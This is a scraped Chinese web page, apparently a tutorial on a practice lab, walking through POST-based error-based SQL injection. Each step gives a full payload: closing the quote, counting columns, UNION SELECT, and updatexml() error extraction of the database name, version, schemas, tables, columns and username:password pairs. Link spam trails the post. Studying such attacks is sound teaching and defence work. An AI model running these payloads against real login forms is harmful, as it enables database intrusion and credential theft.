当前位置: 首页 > news >正文

网站新闻列表怎么做自媒体论坛交流推荐

网站新闻列表怎么做,自媒体论坛交流推荐,5118站长平台,王业美三个字组成的子post提交报错注入 闭合方式及注入点 利用hackbar进行注入,构造post语句 unameaaa"passwdbbb&SubmitSubmit 页面报错,根据分析,闭合方式". 确定列数 构造 unameaaa" or 11 # &passwdbbb&SubmitSubmit 确定存在注…

post提交报错注入

在这里插入图片描述

闭合方式及注入点

利用hackbar进行注入,构造post语句

uname=aaa"passwd=bbb&Submit=Submit
页面报错,根据分析,闭合方式".

确定列数

构造

uname=aaa" or 1=1 # &passwd=bbb&Submit=Submit 确定存在注入

uname=aaa" order by 3 # &passwd=bbb&Submit=Submit 有报错
uname=aaa" order by 2 # &passwd=bbb&Submit=Submit 无报错,列数2

回显位置

uname=aaa" union select 1,2 # &passwd=bbb&Submit=Submit
发现页面没有回显,想到前面 存在报错,想到报错注入

使用updatexml()函数来进行报错注入

查询数据库与版本等

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select database())),3) # &passwd=bbb&Submit=Submit
    数据库名
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select version())),3) # &passwd=bbb&Submit=Submit
    版本

爆出所有数据库

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 0,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 5,1)),3) # &passwd=bbb&Submit=Submit
    通过修改limit函数的值来查询所有的数据库名

爆出所有表名

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 1,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 2,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schema=database() limit 3,1)),3) # &passwd=bbb&Submit=Submit
    得到users

爆出列名

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 1,1)),3) # &passwd=bbb&Submit=Submit
  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 2,1)),3) # &passwd=bbb&Submit=Submit
    得到列id,username,password

爆出数据

  • uname=aaa" union select 1,updatexml(1,concat(‘~’,(select concat(username,‘:’,password) from security.users limit 0,1)),3) # &passwd=bbb&Submit=Submit
    修改0的值,就可以得到所有的数据

完成,

http://www.hrbkazy.com/news/35168.html

相关文章:

  • 做设计必知网站网络销售每天做什么
  • 哈尔滨做网站网站设计用什么软件
  • 网站建设 启象科技企业培训
  • 网站联系我们的地图怎么做的seo推广哪家公司好
  • 做司法考试真题的网站广州全网推广
  • php网站开发实例pdf数据营销
  • 上海建筑工程有限公司广州市口碑seo推广外包
  • 北京网站建设公司华网营业推广案例
  • 网站服务器免费吗河南做网站的
  • 网站收录有什么好处游戏推广赚钱
  • 漳州公司注册seo排名优化哪家好
  • 网站设计第一步怎么做站长工具的网址
  • 大连企业做网站今日新闻头条新闻摘抄
  • 网站建设 html5品牌营销策划书
  • 深圳南山做网站百度网首页官网登录
  • php网站服务建设软文写作范文
  • 网站建设英文怎么说如何做网站营销
  • 网站开发公司售后服务关键词优化是什么
  • 零基础网站建设视频教程互联网推广是做什么的
  • 微信小程序公司网站怎么制作网站维护需要学什么
  • 西安市城乡与住房建设厅网站分类达人的作用
  • 北京免费网站开发维护seo优化是指
  • wordpress更新phpseo中文意思是
  • 设计网站外网广告投放网站平台
  • 广州网站建设培训学校网络营销渠道有哪几种
  • 网页制作专业个人职业生涯规划书seo优化的主要任务包括
  • 深圳疫情新闻发布会直播合肥seo排名优化公司
  • 室外建筑网站seo技术服务外包公司
  • 网站后台哪些功能需要前端配合seo关键词分析
  • 设计一个网站的价格表大数据平台